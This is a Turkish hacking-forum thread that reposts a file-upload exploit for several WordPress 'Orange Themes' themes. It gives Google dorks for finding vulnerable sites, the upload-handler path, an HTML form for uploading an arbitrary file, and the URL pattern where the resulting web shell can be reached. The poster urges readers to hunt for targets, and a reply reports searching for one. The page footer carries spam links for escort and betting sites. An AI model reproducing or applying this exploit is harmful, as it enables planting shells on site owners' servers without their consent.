Wordpress Orange Themes CSRF File Upload Vulnerability

Kzsg

Kzsg

Prof Spys-z
Katılım
28 Ara 2013
Mesajlar
946
Tepkime puanı
0
Puanları
0
Sa Arkadaşlar 1337 Day'da Gezinirken Güzel Bir Wp Açığı Gördüm Sizede Sunmak İstedim Arkadaşlar Dorku Googleye Aratıp Şansınızı Deniyosunuz Neyse Dorkları Vs Vereyim :)


* Wordpress Orange Themes CSRF File Upload Vulnerability *

Googleye Aratacağımız Dorklar

#Dork :
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"


CSRF File Upload Vulnerability

Yani Nereye Up Etceğmizi Gösteriyo :D

' http://site-target/wp-content/themes/rockstar-theme/functions/upload-handler.php '

Script :


<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

Ve En Son :

http://site-target/wp-content/uploads/[years]/[month]/your_shell.php

Yani Yaşınız Tarih Ve Shelliniz

Örnek :

http://127.0.0.1/wp-content/uploads/2013/13/inc0vers.php


Not : Açık Jje Incovers Tarafından Bulunmuştur Ve 1337 Daydan Alınmıştır
 
Perfect-x

Perfect-x

*Vıp Projection
Katılım
11 Ocak 2014
Mesajlar
95
Tepkime puanı
0
Puanları
0
site çok az daha bulamadım bu açıklı bir site :)
 
Kzsg

Kzsg

Prof Spys-z
Katılım
28 Ara 2013
Mesajlar
946
Tepkime puanı
0
Puanları
0
dorkların hepsine bak
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012